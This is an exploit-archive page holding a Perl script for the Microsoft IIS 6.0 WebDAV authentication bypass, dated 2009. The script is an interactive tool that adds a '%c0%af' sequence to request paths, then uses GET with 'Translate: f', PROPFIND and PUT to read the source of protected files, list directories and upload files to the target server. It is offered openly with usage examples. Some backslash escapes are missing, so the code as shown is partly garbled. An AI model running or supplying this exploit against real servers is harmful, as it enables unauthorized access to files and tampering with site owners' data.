Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (pl)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (pl)
# Published : 2009-05-26
# Author : ka0x
# Previous Title : Soulseek 157 NS Remote Buffer Overflow Exploit (SEH)
# Next Title : Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php)

#!/usr/bin/perl -W
#
# Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
# written by ka0x <ka0x01[alt+64]gmail.com>
# Advisory: http://www.milw0rm.com/exploits/8765
#
# Greets: an0de, Piker, xarnuz, NullWave07, Pepelux, k0rde, JoSs, Trancek and others!

use IO::Socket ;

my ( $host, $path ) = @ARGV ;
my $port = 80 ; # webserver port

&usage unless $ARGV[1] ;

$host =~ s/http://// if($host =~ /^http:///i) ;
$path =~ s//// if(substr($path, 0,1) eq '/');

sub _file {
	$file = shift ;
	open(FILE, $file) || die "[-] ERROR: ".$!,"n" ;
	while( <FILE> ){
		$cont .= $_ ;
	}
	close(FILE) ;
	return $cont ;
}


print "write 'help' for get help listn";


while( 1 ) {

	my $sock = IO::Socket::INET->new (PeerAddr => $host, 
					PeerPort => $port,
					Proto    => 'tcp') || die "n[-] ERROR: ".$!,"n" ;
	print "$> ";
	chomp( my $option = <STDIN> ) ;
	last if $option eq 'quit' ;

	if($option eq 'source') {
		$path =~ s///%c0%af// ; 
		print $sock "GET /".$path." HTTP/1.1rn" ; 
		print $sock "Translate: frn" ;
		print $sock "Host: ".$host."rn" ;
		print $sock "Connection: closernrn" ;

		while(<$sock>){
			print $_ ;
		}
		close($sock) ;
	}


	elsif($option eq 'path') {
		$path =~ s///%c0%af// ;
		print $sock "PROPFIND  /".$path." HTTP/1.1rn" ;
		print $sock "Host: ".$host."rn" ;
		print $sock "Connection:closern" ;
		print $sock 'Content-Type: text/xml; charset="utf-8"'."rn" ;
		print $sock "Content-Length: 0rnrn" ;
		print $sock  '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://www.foo.bar/boxschema/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>' ;

		while(<$sock>){
			print $_ ;
		}
		close($sock) ;
	}


	elsif($option eq 'put') {
		$path =~ s///%c0%af// ;
		print "[*] Insert a local file (ex: /root/file.txt): " ;
		chomp( $local = <STDIN> ) ;
		$file_l = _file( $local ) ;
		print $sock "PUT /".$path."my_file.txt HTTP/1.1rn" ;
		print $sock "Host: ".$host."rn" ;
		print $sock 'Content-Type: text/xml; charset="utf-8"'."rn" ;
		print $sock "Connection:closern" ;
		print $sock "Content-Length: ".length($file_l)."rnrn" ;
		print $sock $file_l,"rn" ;

		while(<$sock>){
			print $_ ;
		}
		close($sock) ;
	}

	elsif($option eq 'help') {
		print "ntt- OPTIONS -nnn" ;
		print "thelpttgive this help listn" ;
		print "tsourcettget file contentn" ;
		print "tpathttget directory contentsn" ;
		print "tputttput filen" ;
		print "tquitttexit exploitnn" ;
	}
	
}

sub usage {
	print << 'EOH' ;

  $ Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
  $ written by ka0x <ka0x01[at]gmail.com>
  $ 25/05/2009

usage:
   perl $0 <host> <path>

example:
   perl $0 localhost dir/
   perl $0 localhost dir/file.txt

EOH

	exit;
}
	
	


__END__

# www.Syue.com [2009-05-26]